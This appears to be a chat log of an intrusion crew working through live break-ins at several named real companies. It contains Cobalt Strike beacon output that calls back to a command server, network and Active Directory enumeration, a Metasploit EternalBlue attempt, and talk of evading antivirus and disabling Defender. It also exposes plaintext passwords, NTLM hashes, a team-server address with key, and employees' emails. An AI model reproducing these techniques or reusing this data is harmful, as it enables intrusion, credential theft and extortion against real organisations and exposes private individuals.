bod01-vce01.eu.wilsonart.com net view \bod01-vce01.eu.wilsonart.com /all System error 53 has occurred. The network path was not found. 
Ping statistics for 10.40.60.70: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 10.40.60.70:9443 10.40.60.70:9087 10.40.60.70:9084 10.40.60.70:8084 10.40.60.70:8008 10.40.60.70:7444 10.40.60.70:5580 10.40.60.70:5480 10.40.60.70:5060 10.40.60.70:2020 10.40.60.70:2015 10.40.60.70:2014 10.40.60.70:2012 10.40.60.70:2000 10.40.60.70:1514 10.40.60.70:636 10.40.60.70:514 10.40.60.70:443 10.40.60.70:389 10.40.60.70:110 10.40.60.70:88 10.40.60.70:80 10.40.60.70:25 10.40.60.70:21 >description: Veeam Backup Server >operatingSystem: Windows Server 2016 Standard >dNSHostName: bod01-bkp01.eu.Wilsonart.com Share name Type Used as Comment ---------------------------------------------- ADMIN$ Disk Remote Admin C$ Disk Default share D$ Disk Default share F$ Disk Default share IPC$ IPC Remote IPC R$ Disk Default share V$ Disk Default share veeam_agent_ISOs Disk W$ Disk Default share X$ Disk Default share >dNSHostName: nas_signature.polyrey.net Share name Type Used as Comment ------------------------------------------------ Archives_Outlook Disk Astier Disk CALDERA_RIPS Disk Depot Disk Design Library Disk INFO Disk IPC$ IPC IPC Service () PROJETS_Signature Disk Signature_PAO Disk TEST_JFC Disk Users_Archives Disk Users_Archives 172.25.168.64:6281 172.25.168.64:5001 172.25.168.64:5000 172.25.168.64:548 172.25.168.64:443 172.25.168.64:139 172.25.168.64:80 172.25.168.64:445 (platform: 500 version: 6.1 name: NAS_SIGNATURE domain: POLYREY) >description: virtual on VMware (Win 10) >operatingSystem: Windows 10 Pro >dNSHostName: VIPW7700.resopal.lan net view \VIPW7700.resopal.lan /all System error 53 has occurred. The network path was not found. Reply from 172.22.198.250: Destination host unreachable.
Ping statistics for 172.22.190.190: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 172.22.198.250:541 172.22.198.250:443 172.22.198.250:22 (SSH-2.0-U_fcWc) >operatingSystem: Windows 7 Professional >dNSHostName: BBBACKUP.bushboard.co.uk Ping request could not find host BBBACKUP.bushboard.co.uk. Please check the name and try again. >description: Backup Server >operatingSystem: Windows Server 2012 Datacenter >servicePrincipalName: MSSQLSvc/BBBK01.bushboard.co.uk:VEEAMSQL2012 >dNSHostName: BBBK01.bushboard.co.uk Ping statistics for 2002:c001:147::c001:147: Packets: Sent = 1, Received = 0, Lost = 1 (100% loss), >operatingSystem: Windows Server 2012 Datacenter >servicePrincipalName: MSSQLSvc/testmove.bushboard.co.uk:VEEAMSQL2012 >dNSHostName: testmove.bushboard.co.uk Ping statistics for 2002:c001:15c::c001:15c: Packets: Sent = 1, Received = 0, Lost = 1 (100% loss), >operatingSystem: Windows Server 2016 Standard >servicePrincipalName: MSSQLSvc/BBDC03.bushboard.co.uk:VEEAMSQL2012 >servicePrincipalName: MSSQLSvc/BBDC03.bushboard.co.uk:VEEAMSQL2016 >dNSHostName: BBDC03.bushboard.co.uk Share name Type Used as Comment ------------------------------------------------------------------------------- ADMIN$ Disk Remote Admin Bushboard Backups Disk C$ Disk Default share E$ Disk Default share F$ Disk Default share IPC$ IPC Remote IPC iTop-2.6.1-4463 Disk log Disk SQL_Server Disk U$ Disk Default share UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system. VBRCatalog Disk vCenterBackups Disk WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system. WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance.
>operatingSystem: unknown >dNSHostName: ltn01-vcenter01.bushboard.co.uk Ping statistics for 2002:c001:111::c001:111: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), >operatingSystem: Windows 10 Pro >dNSHostName: NB-AsemBackup.technistone.local >User: adm-cavailj - IP Address: 172.25.168.113 `User: petersm2 - IP Address: 170.7.76.192```` adm-cavailj adm-GrelleS Administrator alexanm bmccm fowlerh lucase moorer2 owensd petersm2 polyreyadmin roeders solarwindsarm.svc vyombmccm `````` Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator sysadmin ZOHOCORP\raja-9298 The command completed successfully. The request will be processed at a domain controller for domain csez.zohocorpin.com. Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- Administrator pmpdemo rmp The command completed successfully. The request will be processed at a domain controller for domain csez.zohocorpin.com. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator adssp assetprober desktopcentral gjprabu-0985 kamal-0150 nocfw sysadmin sysaudit vijay-3486 zohoits The command completed successfully. 
``open as xls`` Resource Name User Account Password anand1 acc1 test1_%#@ anand1 aa aa z$ZMGxCAewr8Z Gun as p7 portscan 192.168.16.0/24 23,22,80,1433,135,445,3389,5900 [*] Tasked beacon to scan ports 23,22,80,1433,135,445,3389,5900 on 192.168.16.0/24 [+] host called home, sent: 74813 bytes [+] received output: Scanner module is complete beacon> portscan 192.168.16.0/24 [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on 192.168.16.0/24 [+] host called home, sent: 74813 bytes [+] received output: Scanner module is complete ``exactly))`` double space bar try to remove the double space bar really started, although I'm sure it gave an error.... but ok `execute-assembly /home/user/Desktop/TOOLS/1/Rubeus.exe monitor /interval:1` - does not want to work and gives help. is there anything you can do about it? hmm. now it weighs230 kilobytes it is heavier than 1M for fileless execution and why do you drop it?i need to run rubus and AV kills it as soon as i drop it in my mind yes, what's wrong with dll? @tl2 do we have a way to pack the exe file so it won't get killed by AV? `Win 7 Pro ``` svembu.localzoho.com [172.20.3.7] zcpl-wine6420.localzoho.com [172.20.3.7] rex-0179.localzoho.com [172.20.3.7] oorni-3055.localzoho.com [172.20.3.7] vijaya-dr1.localzoho.com [172.20.3.7] srini-1728.localzoho.com [172.20.3.7] zforms-w7-64-1.localzoho.com [172.20.3.7] abrar--4885.localzoho.com [172.20.3.7] mohammed-con127.localzoho.com [172.20.3.7] mohan-2271-temp.localzoho.com [172.20.3.7] integ-wiin7.localzoho.com [172.20.3.7] sivanandam-2729.localzoho.com [172.20.3.7] integ-win7-1-bc.localzoho.com [172.20.3.7] integ-win7-1.csez.zohocorpin.com [192.168.113.57] integ-win7-2.csez.zohocorpin.com [192.168.113.71] tmrm-compliance.csez.zohocorpin.com [192.168.225.179] ``would need to specify domain sbmuser sbmdomain sbmpassprice... it's strange that it's vulnerable...but here you probably need a credentials... 
[*] 192.168.113.242:445 - Target OS: Windows 10 Pro 10586 [-] 192.168.113.242:445 - Unable to find accessible named pipe! [*] 192.168.113.242:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ``would ms17_010_command not use@tl2 any ideas? ``` msf6 exploit(windows/smb/ms17_010_eternalblue) > run [*] 192.168.113.242:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.113.242:445 - Host is probably VULNERABLE to MS17-010! - Windows 10 Pro 10586 x64 (64-bit) [*] 192.168.113.242:445 - Scanned 1 of 1 hosts (100% complete) [*] 192.168.113.242:445 - Connecting to target for exploitation. [+] 192.168.113.242:445 - Connection established for exploitation. [+] 192.168.113.242:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.113.242:445 - CORE raw buffer dump (20 bytes) [*] 192.168.113.242:445 - 0x00000000 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 31 Windows 10 Pro 1 [*] 192.168.113.242:445 - 0x00000010 30 35 38 36 0586 [+] 192.168.113.242:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.113.242:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.113.242:445 - Sending all but last fragment of exploit packet [-] 192.168.113.242:445 - RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30) [*] Started bind TCP handler against 192.168.113.242:4444 [*] Exploit completed, but no session was created.
```
msf6 exploit(windows/smb/ms17_010_eternalblue) >
```
`Win Serv 2008 R2`
```
win2k8adc.localzoho.com [172.20.3.7]
vcenter.localzoho.com [172.20.3.7]
print-server-bk.localzoho.com [172.20.3.7]
hpacc-control.localzoho.com [172.20.3.7]
printserver.csez.zohocorpin.com [192.168.100.206]
est-it-storage.csez.zohocorpin.com [192.168.100.74]
est-av-server.csez.zohocorpin.com [192.168.100.68]
finance-server.csez.zohocorpin.com [192.168.112.132]
integ-i18n.csez.zohocorpin.com [192.168.113.56]
tally-server.csez.zohocorpin.com [192.168.206.51]
```
``Well, there's one already.``
then scanning the win2008 servers for 17-010 is still quite possible
and the second one
```
beacon> shell ping INTEG-DRBD-XP64
[*] Tasked beacon to run: ping INTEG-DRBD-XP64
[+] host called home, sent: 51 bytes
[+] received output:
Pinging integ-drbd-xp64.csez.zohocorpin.com [192.168.113.49] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Ping statistics for 192.168.113.49:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
```
``One.``
```
beacon> shell ping INTEG-XP1
[*] Tasked beacon to run: ping INTEG-XP1
[+] host called home, sent: 45 bytes
[+] received output:
Pinging integ-xp1.csez.zohocorpin.com [192.168.113.58] with 32 bytes of data:
Reply from 192.168.113.58: bytes=32 time=8ms TTL=62
Reply from 192.168.113.58: bytes=32 time=8ms TTL=62
Reply from 192.168.113.58: bytes=32 time=8ms TTL=62
Reply from 192.168.113.58: bytes=32 time=8ms TTL=62
Ping statistics for 192.168.113.58:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 8ms, Maximum = 8ms, Average = 8ms
```
``There's still no XP exploit working, so why don't you try 17-010?``
XP Professional is, and 2012 R2 is; 2008 R2
AD has no 2003 / XP machines?
Just nothing else comes to mind, but it's hardly a good idea ... big network, brute-force here....
maybe try a list of domain admins
@tl1 Maybe brute-force the top passwords?
```
Minimum password length: 8
Length of password history maintained: 3
Lockout threshold: 15
Lockout duration (minutes): 15
```
``Describe progress to the workgroups``
widen
signed by @user8
`LP-BC8DTT2`
what was the pc name? or the user
wosupply.com
desire2learn.com user:jguerrero
bigassfans.com user:lmmoore
which ones are dead?
can i get into wsndomain.com?
both networks are dead
the rest are dead
no i have 1
how many networks with YES?
how many, or how many of each?
yes, mine is back, working with it
check the input cob
u i got 30
silencershop.com
in the same groups
the rest of you who are working, write down the progress
who wrote down the dead sessions in groups, wait 20 minutes
write in groups that need to be reopened
created
go to the site - d2l.com
yes
```
URL : https://wosupply.okta.com/
Username : bert.engeron@wosupply.com
Password : Summer2019
```
i think this is the real domain
desire2learn.com
I just downloaded it, what is the real domain of the group?
@tl1 ad_user_desireln.d2lvv taken
+1 free
see?
I can't see it, I've already created a confu >userPrincipalName: *davidw@dvdempire.lan >objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=dvdempire,DC=lan >dSCorePropagationData: 16010101000000.0Z >lastLogonTimestamp: 132467236873201585 >textEncodedORAddress: X400:C=us;A= ;P=DVD Empire;O=Exchange;S=Walter;G=David;I=M; *>mail: davidw@dvdempire.com ````dvdempire.lan ``dvdempire.com```` >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@sugarinstant.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@tlagay.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@popporn.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@digiflixxx.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@adultempiredistributing.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@pornstarempire.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@ravanallc.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@empirestore.net >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@dekkoo.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@adultempirefilms.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@empirestores.co >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@adultempirecash.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@whackoffer.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@useddvdempire.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@blackholeboards.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@bedroomadvisor.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@bargainadultdvd.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@strangespin.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@bluedoor.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@rentals.goodvibes.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@vivid.dvdempire.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@spicetvstore.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@arraydisplays.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@it.dvdempire.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@empirebase.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@sixflavors.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@uencode.net 
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@uencode.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@total2257.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@2257.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@bluecastvod.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@adultempire.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@redgalaxy.com
>proxyAddresses: SMTP:GFIME_MOVEEXCH_USER@adultdvdempire.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@dvdempire.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@gaydvdempire.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@useddvd.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@stripclubdatabase.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@pornstardata.com
>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@dvdempire.lan
>proxyAddress
What is the real one?
At the end, the fucking dvdempire.lan
mbh mobile user and works through wifi
Colleagues, I'm writing a note to the general channel! In the mstsc.exe process the shell did not work for me, with the following error:
```
[-] Could not connect to pipe: 2
```
The right solution to this error was to inject into another process, namely rundll32.exe
Now I use the command line without knowing what to do!
Not finding the software
mzt+ there is one more available
@user7 your back `BEngeron@192.168.0.19 (LP-BC8DTT2)`
ifconfig did not show anything, now check cf
@user1 your back
Checking for signs of vpn?
who died could come back
Check input cob
No connection
On the second
`LDAP_BIND: [] Error 0x51 (81) - Server Down Terminating program.`
Nothing comes up
net domain and AD find don't start
why?
Mm-hmm
```
>mail: KMartin@snpartners.com
>proxyAddresses: SMTP:KMartin@snpartners.com
```
AD not dumped, probably
snpartners.com
what are the names of the fields?
look - there are lots of emails on domains in users
https://www.snpartners.com/ https://www.martinsullivan.com/ https://www.snpartners.com/ they all have something to do with john deere
One
FMP.local
2 came
@user3 take it away there
+1 session new
where did you download the ad users?
I downloaded there above - there the names are autogenerated
take the ad users and watch it
then sure, not av
lab
121 mb file on ad users - even in the terminal not all of it fits
what about ad?
```
172.31.190.10:445 (platform: 500 version: 10.0 name: JDODC64 domain: JDOSSN)
172.31.190.11:445 (platform: 500 version: 10.0 name: JDODC64 domain: JDOSSN)
[+] received output:
172.31.190.12:445 (platform: 500 version: 10.0 name: JDODC65 domain: JDOSSN)
172.31.190.16:445 (platform: 500 version: 6.3 name: JDOFIEECONN01 domain: JDOSSN)
172.31.190.17:445 (platform: 500 version: 10.0 name: JDODHCP02 domain: JDOSSN)
[+] received output:
172.31.190.47:445 (platform: 500 version: 10.0 name: JDODC67 domain: JDOSSN)
172.31.190.62:445 (platform: 500 version: 6.3 name: JDOCHOPS12 domain: JDOSSN)
172.31.190.66:445 (platform: 500 version: 6.3 name: JDOCHSVC12 domain: JDOSSN)
172.31.190.100:445 (platform: 500 version: 5.0 name: NDHSNASC9102 domain: JDOSSN)
172.31.190.101:445 (platform: 500 version: 5.0 name: NDHSNASC9103 domain: JDOSSN)
172.31.190.102:445 (platform: 500 version: 5.0 name: NDHSNASC9014 domain: JDOSSN)
172.31.190.103:445 (platform: 500 version: 5.0 name: NDHSNASTESTC001 domain: JDOSSN)
Scanner module is complete
```
``20 min``
Hung
There are 10 in progress
+
do all groups have this address in their mail?
I think so.
E-mail: briancarroll@directmail.com
``This isn't porn``
https://www.bigassfans.com/
with PowerShell under the user either
```
Name : Private Dashboard | Big Ass Fans
URL : https://bigassfans.myabsorb.com/#/dashboard
```
``Real domain, and I'm creating a confab``
hell, info I didn't ask for. Why?
@user9 .local doesn't count
@user3 the main domain is real and I'll create a chat room - Austin.SilencerShop.com
Will you make groups that don't litter here?
@tl1 thinks it's real
@user9 check the browser anyway
Are there any trusts @user9?
seems normal, few machines and users 133/68``` Host Name: MMURPHY OS Name: Microsoft Windows 10 Pro OS Version: 10.0.18362 N/A Build 18362 OS Manufacturer: Microsoft Corporation OS Configuration: Member Workstation OS Build Type: Multiprocessor Free Registered Owner: helpdesk Registered Organization: N/A Product ID: 00330-80136-38831-AA714 Original Install Date: 3/5/2020, 7:55:40 AM System Boot Time: 10/15/2020, 3:13:39 PM System Manufacturer: Microsoft Corporation System Model: Surface Laptop 3 System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: Intel64 Family 6 Model 126 Stepping 5 GenuineIntel ~1198 Mhz BIOS Version: Microsoft Corporation 7.124.140, 6/23/2020 Windows Directory: C:\windows System Directory: C:{windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 7,782 MB Available Physical Memory: 3,868 MB Virtual Memory: Max Size: 8,998 MB Virtual Memory: Available: 4,426 MB Virtual Memory: In Use: 4,572 MB Page File Location(s): C:\pagefile.sys Domain: DMGROUP Logon Server: \CYMA17 Hotfix(s): 9 Hotfix(s) Installed. [01]: KB4578974 [02]: KB4497727 [03]: KB4521863 [04]: KB4561600 [05]: KB4576751 [06]: KB4576754 [07]: KB4577670 [08]: KB4580325 [09]: KB4577671 Network Card(s): 4 NIC(s) Installed. 
[01]: Intel(R) Wi-Fi 6 AX201 160MHz Connection Name: Wi-Fi Status: Media disconnected [02]: Bluetooth Device (Personal Area Network) Connection Name: Bluetooth Network Connection Status: Media disconnected [03]: TAP-Windows Adapter V9 Connection Name: Local Area Connection Status: Media disconnected [04]: DisplayLink Network Adapter NCM Connection Name: Ethernet 3 DHCP Enabled: Yes DHCP Server: 172.16.4.69 IP address(es) [01]: 172.16.4.42 [02]: fe80::59eb:2e4:28b8:70ee Hyper-V Requirements: VM Monitor Mode Extensions: Yes Virtualization Enabled In Firmware: Yes Second Level Address Translation: Yes Data Execution Prevention Available: Yes ``Trend Mycrots have one more free session available and check out the users[ ](https://mediaeveryone.com/channel/general?msg=kNNDhmN3z5kdL2Bj8) `` Host Name: W08872612198 OS Name: Microsoft Windows 10 Pro OS Version: 10.0.18362 N/A Build 18362 OS Manufacturer: Microsoft Corporation OS Configuration: Member Workstation OS Build Type: Multiprocessor Free Registered Owner: W08872612198 Registered Organization: N/A Product ID: 00330-52406-72961-AAOEM Original Install Date: 12/5/2019, 6:01:44 PM System Boot Time: 9/23/2020, 12:22:08 AM System Manufacturer: Dell Inc. System Model: OptiPlex 5070 System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: Intel64 Family 6 Model 158 Stepping 13 GenuineIntel ~3000 Mhz BIOS Version: Dell Inc. 1.2.1, 11/14/2019 Windows Directory: C:\Windows System Directory: C:{Windows\system32 Boot Device: \Device\HarddiskVolume3 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-06:00) Central Time (US & Canada) Total Physical Memory: 16.166 MB Available Physical Memory: 8.825 MB Virtual Memory: Max Size: 18,598 MB Virtual Memory: Available: 8,859 MB Virtual Memory: In Use: 9,739 MB Page File Location(s): C:\pagefile.sys Domain: jdossn.local Logon Server: \JDODC12 Hotfix(s): 14 Hotfix(s) Installed. 
```
Hotfix(s): 14 Hotfix(s) Installed.
    [01]: KB4552931
    [02]: KB4497165
    [03]: KB4497727
    [04]: KB4515383
    [05]: KB4516115
    [06]: KB4524569
    [07]: KB4528759
    [08]: KB4537759
    [09]: KB4560959
    [10]: KB4561600
    [11]: KB4565554
    [12]: KB4569073
    [13]: KB4576751
    [14]: KB4574727
Network Card(s): 2 NIC(s) Installed.
    [01]: Intel(R) Ethernet Connection (7) I219-V
        Connection Name: Ethernet
        DHCP Enabled: Yes
        DHCP Server: 172.31.190.17
        IP address(es)
        [01]: 10.51.128.172
        [02]: fe80::896f:a415:af2d:57b1
    [02]: Intel(R) Wireless-AC 9560 160MHz
        Connection Name: Wi-Fi
        Status: Media disconnected
Hyper-V Requirements: VM Monitor Mode Extensions: Yes
    Virtualization Enabled In Firmware: Yes
    Second Level Address Translation: Yes
    Data Execution Prevention Available: Yes
```
``What's the OS? Because there's no AV?``
```
[+] Determining what EDR products are installed on localhost...
[+] No EDR products found! Operate at your own risk!
```
```
beacon> psinject 13584 x86 Get-DomainUser -Server 10.50.212.45 | out-file -filepath "C:\ProgramData\ad_users.txt"
[*] Tasked beacon to psinject: Get-DomainUser -Server 10.50.212.45 | out-file -filepath "C:\ProgramData\ad_users.txt" into 13584 (x86)
[+] host called home, sent: 125019 bytes
[+] received output:
ERROR: FindAll : Exception calling "FindAll" with "0" argument(s): "The server is not operational.
ERROR: "
ERROR:
ERROR: At line:5253 char:52
ERROR: + else { $Results = $UserSearcher.FindAll <<<< () }
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : DotNetMethodException
ERROR:
```
``The ad_users in the mail address will be the real domain; if it is .local then most likely something is wrong. check processes first, browser, ad info``
the names are strange...
```
txbaybcraig txbaybcware TXBayCGarza txbaycharki txbaycphill txbaydblake txbayecooke TXBayFBanks TXBayGHebel TXBayGLane txbayjwille TXBayKSchoe txbaymkurz txbaymobile txbayoffice TXBayParts txbayparts2 txbayrmedin TXBayRSeide txbayrvince txbayrzenke txbaysdtv txbaytech1 txbaytech10 txbaytech11 txbaytech12 txbaytech2 txbaytech3 txbaytech4 txbaytech5 txbaytech6 txbaytech7 txbaytech8 txbaytech9 TXBayTechn txbaytechn2 txbaytlucas TXBayTStein txbaywhouse TXBea4PBeau txbeaablanc txbeabblack txbeacsory txbeacthibo TXBeaDBertino txbeadblanc TXBeaDLivin txbeadrive1 txbeajborda txbeajbowen txbeajlariv txbeajleach TXBeaKHoffm txbeaklee
```
``try to take it off through the shell``
didn't create through run, just displayed a list of name+group
through the shell it did not work, with the same error
is it an external domain?
try to run adfind.exe directly without the bat
```
beacon> run AdFind.bat
[*] Tasked beacon to run: AdFind.bat
[+] host called home, sent: 347720 bytes
[-] could not spawn AdFind.bat: 5
```
``within run?``
```
beacon> shell AdFind.bat
[*] Tasked beacon to run: AdFind.bat
[+] host called home, sent: 41 bytes
[-] could not spawn C:\WINDOWS\system32\cmd.exe /C AdFind.bat: 5
beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[-] could not spawn C:\WINDOWS\system32\cmd.exe /C dir: 5
```
``Not local, real domains plz``
```
usr2-2[LP-BC8DTT2]BEngeron/15956|2020Oct15 22:33:49> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
WOSupply.local
```
``Look at the ad users and tell me if it happens or not, but it seems to be a real session``
```
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 231 bytes
[+] received output:
BigAssFan.local
```
``or reality? is it a trick``
BigAssFan.local
on the classic - get the session, write the domain here, create a confab and then as usual
for nothing
good, thank you
at most you will look for profiles for the team server
do not think
tomorrow I will throw you the guide, it is understandable enough
tomorrow there will be no questions
questions?
tomorrow you and I will deal with cob settings and stuff, with servers
today we will solve the problem
plan following
```
104.194.11.160:41476 SISmByXnBD8YYmmWFNtumTJWsX8YQhO4O6VR
```
here come the sessions, separate the AV/Honey from the normal networks and work with them, the cob is clean, you can pass yourself from here or work in it, depends on the dirt
your cob, already wrote about it
so we were told to fuck up now, so that you fuck up less later because you are busy
@user7 about the cob a little later
is this familiar?
I'm not asking how you infect the victim, I'm asking how you crypt the cob and stuff like session distribution between the teams
how do you prepare the cob?
well, here's how you get the sessions?
@tl2 and silence, thank you at least for such answers (
ok, then how to configure?
setup - please
if you do not know where to get servers I will not tell here
@user8 already wrote himself
think about it and ask us
first we want an answer to this question, where and how can you tell us?
first thing: where will you take servers from?
what, how and why
do we know the order of getting sessions on the cob
1. how to prepare a cob
2. what to do
3. how to do it correctly
4. the principles of work
to explain everything we need to bring it to us, all of it
the cob needs an algorithm for obtaining a new cob for each day with new configs, spacers, servers
clean after configurations? next after what?
hmm. let's say, what next? or how to understand what I wrote?
thank you, all clear
server registration, configuration of a web server with a domain and ssl which is sent to the server cobs
hear, hear
Please hear my cry from the soul!
A to Z needs a complete scheme, not links to git
@tl1 @tl2 and about "spacers" in detail and the whole list of preparations
setup cob
Explain in full the principle of getting a cob
@tl1 @tl2 Please take 10-15 minutes now, rather than be distracted by our pings with stupid questions
@tl1 @tl2 How to make sure the cobs arrive without pestering you with this?
after 10 days
@tl1 @tl2 what about today's nets?
:smirk: you will be the last one in any case)
tell me if there are mistakes, otherwise it will not work and I will be the last one to blame!
https://helpdocpt.club/threads/windows-%D0%A4%D0%BE%D1%80%D1%81-%D1%83%D0%B4%D0%B0%D0%BB%D1%91%D0%BD%D0%BD%D0%BE%D0%B3%D0%BE-%D0%BE%D0%B1%D0%BD%D0%BE%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F-%D0%B3%D1%80%D1%83%D0%BF%D0%BF%D0%BE%D0%B2%D1%8B%D1%85-%D0%BF%D0%BE%D0%BB%D0%B8%D1%82%D0%B8%D0%BA.43/
are there any linguists?
check https://helpdocpt.club/threads/%D0%9E%D1%82%D0%BA%D0%BB%D1%8E%D1%87%D0%B5%D0%BD%D0%B8%D0%B5-windows-defender-%D1%87%D0%B5%D1%80%D0%B5%D0%B7-%D0%B3%D1%80%D1%83%D0%BF%D0%BF%D0%BE%D0%B2%D1%8B%D0%B5-%D0%BF%D0%BE%D0%BB%D0%B8%D1%82%D0%B8%D0%BA%D0%B8.42/
well, if they are finished it is unlikely there is anything else to do there
also LPE exploits
translate the guide on disabling Win Defender for the forum
nonstop check everything, to have time to deal with the forum and additional modules
nah (the old ones have not arrived?
nah (no sessions?)
Hello
Hello
Good afternoon
if there are sessions - wait
so are we done?
better get a "local" admin if you're inside your trust domain
i haven't changed passwords?
```
beacon> make_token saig.frd.global\adm.soucam1 chs@1944!
[*] Tasked beacon to create a token for saig.frd.global\adm.soucam1
[+] host called home, sent: 55 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
beacon> shell tasklist /s 10.195.23.14 /v
[*] Tasked beacon to run: tasklist /s 10.195.23.14 /v
[+] host called home, sent: 58 bytes
[+] received output:
ERROR: Logon failure: unknown user name or bad password.
```
``1 out of 3 should hit)``
and you try the other 2
Password expires 11/10/2018 6:46:28 PM
```
beacon> shell net use X: \\10.195.113.12\C$\temp /user:c360.local\adm.ravven0 Need2learn2008
[*] Tasked beacon to run: net use X: \\10.195.113.12\C$\temp /user:c360.local\adm.ravven0 Need2learn2008
[+] host called home, sent: 109 bytes
[+] received output:
System error 2242 has occurred.
The password of this user has expired.
```
``then look at the program files``
```
beacon> shell tasklist /s 10.195.13.14 /v /u c360.local\adm.ravven0 /p Need2learn2008
[*] Tasked beacon to run: tasklist /s 10.195.13.14 /v /u c360.local\adm.ravven0 /p Need2learn2008
[+] host called home, sent: 102 bytes
[+] received output:
ERROR: The RPC server is unavailable.
```
``Try directly specifying the creds without a token``
here are 3 pcs
```
adm.ravven0:Need2learn2008
```
```
adm.taydav1:G0d1sr3al!
```
```
adm.turime0:Concentrada2
```
```
1210 adm.kinzac1 52ab4557416b5fd8dfeed6e329db05fb 512
1199 adm.turime0 aa94145c9f2d8a1cea6b554049fe7c1d 512
1207 adm.matdmy0 43527144907fdc17ccf21dac8f24a39c 66048
1202 adm.kalnic0 d9c4c5a3dca64991399474767d6276b9f9 512
500 c360.datacentre 1cd6234cdaf74494d8689cd56317637c 66048
1205 adm.bisfra0 0e36ddd194d4b863966cf521fd6e683e 512
1216 adm.facjoe0 c58e6ce4e121d1c79ff799b42898121d 512
1118 adm.ravven0 ebc8defb32dea60e9ed2470e6810a76b 512
1218 adm.taydav1 03e9c6b99ff2bbdf6f8c39af19e1b7d0 512
```
I'll check 5 or 6 of them
and give me the hashes of the critical infrastructure servers required for domain authentication
but if there is also some share there, you can leave the mark
domain controllers always necessarily remain in a separate group
clearcred no
then another
yes, with cleared creds
```
>operatingSystem: Windows Server 2012 R2 Standard
>operatingSystemVersion: 6.3 (9600)
```
```
beacon> portscan 10.195.13.14 445,139 icmp 1024
[*] Tasked beacon to scan ports 445,139 on 10.195.13.14
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.195.13.14' is alive. [read 8 bytes]
10.195.13.14:139
10.195.13.14:445 (platform: 500 version: 6.3 name: AUHDC1-CSPSQL10 domain: C360)
Scanner module is complete
```
Try it with direct creds specified?
which OS, domain will it detect?
and portscan 139 445 on this pc
```
beacon> shell net user adm.ji0lei0 /dom
[*] Tasked beacon to run: net user adm.ji0lei0 /dom
[+] host called home, sent: 56 bytes
[+] received output:
User name                    adm.ji0lei0
Full Name                    Admin - Leida Ji
Comment
User's comment
